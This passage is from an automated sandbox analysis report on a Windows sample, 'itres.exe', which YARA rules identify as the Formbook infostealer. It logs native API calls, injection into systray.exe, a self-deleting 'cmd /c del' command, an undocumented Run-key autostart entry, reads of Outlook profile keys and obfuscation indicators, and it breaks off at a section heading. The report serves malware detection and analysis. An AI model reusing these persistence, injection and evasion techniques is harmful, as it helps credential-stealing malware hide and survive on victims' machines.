          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417B0A NtAllocateVirtualMemory,1_2_00417B0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759540 NtReadFile,LdrInitializeThunk,4_2_04759540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047595D0 NtClose,LdrInitializeThunk,4_2_047595D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04759660
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759650 NtQueryValueKey,LdrInitializeThunk,4_2_04759650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759610 NtEnumerateValueKey,LdrInitializeThunk,4_2_04759610
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047596E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_047596E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047596D0 NtCreateKey,LdrInitializeThunk,4_2_047596D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759710 NtQueryInformationToken,LdrInitializeThunk,4_2_04759710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759FE0 NtCreateMutant,LdrInitializeThunk,4_2_04759FE0
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047599A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759B00 NtSetValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759560 NtWriteFile
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0475AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047595F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0475A770 NtOpenThread
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759760 NtOpenProcess
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0475A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047597A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0475B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047598F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047598A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047599D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759A20 NtResumeThread
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759A10 NtQuerySection
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04759A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0475A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E87A60 NtClose
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E87B10 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E879E0 NtReadFile
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E87930 NtCreateFile
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E87B0A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E879DA NtReadFile
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E87987 NtReadFile
          Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 0471B150 appears 145 times
          Source: itres.exe Static PE information: invalid certificate
          Source: itres.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: itres.exe Binary or memory string: OriginalFilename vs itres.exe
          Source: itres.exe, 00000000.00000002.183528208.00000000034AD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAlienRunPE.dll6 vs itres.exe
          Source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs itres.exe
          Source: itres.exe, 00000001.00000002.220957412.0000000000E16000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs itres.exe
          Source: itres.exe Binary or memory string: OriginalFilenameGoogle Chrome.exe< vs itres.exe
          Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: itres.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@14/9
          Source: C:\Users\user\Desktop\itres.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\itres.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_01
          Source: C:\Users\user\Desktop\itres.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\itres.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: itres.exe Virustotal: Detection: 56%
          Source: itres.exe ReversingLabs: Detection: 58%
          Source: unknown Process created: C:\Users\user\Desktop\itres.exe 'C:\Users\user\Desktop\itres.exe'
          Source: unknown Process created: C:\Users\user\Desktop\itres.exe C:\Users\user\Desktop\itres.exe
          Source: unknown Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\itres.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\itres.exe Process created: C:\Users\user\Desktop\itres.exe C:\Users\user\Desktop\itres.exe
          Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\itres.exe'
          Source: C:\Windows\SysWOW64\systray.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: itres.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: itres.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: systray.pdb source: itres.exe, 00000001.00000002.220939136.0000000000E0A000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: itres.exe, 00000001.00000002.220939136.0000000000E0A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp, systray.exe, 00000004.00000002.442081918.00000000046F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp, systray.exe

          Data Obfuscation:

          barindex
          Binary contains a suspicious time stamp
          Source: initial sample Static PE information: 0xCD22C4C3 [Sun Jan 22 10:11:15 2079 UTC]
          Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_000D02A1 push es; retf 0_2_000D02F0
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_004148E6 push es; retf 1_2_004148ED
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00414977 push esi; ret 1_2_00414978
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00417C73 push cs; retf 1_2_00417C7E
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
          Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_007802A1 push es; retf 1_2_007802F0
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0476D0D1 push ecx; ret 4_2_0476D0E4
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AAF5 push eax; ret 4_2_02E8AB48
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8ABAC push eax; ret 4_2_02E8ABB2
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AB4B push eax; ret 4_2_02E8ABB2
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AB42 push eax; ret 4_2_02E8AB48
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E848E6 push es; retf 4_2_02E848ED
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E849C5 pushfd ; iretd 4_2_02E849C6
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E84977 push esi; ret 4_2_02E84978
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E84E46 push 76AC60C6h; retf 4_2_02E84E4B
          Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E87C73 push cs; retf 4_2_02E87C7E
          Source: initial sample Static PE information: section name: .text entropy: 7.9315085015

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key
          Source: C:\Windows\SysWOW64\systray.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run YFIPILCX9DA
          Source: C:\Users\user\Desktop\itres.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion: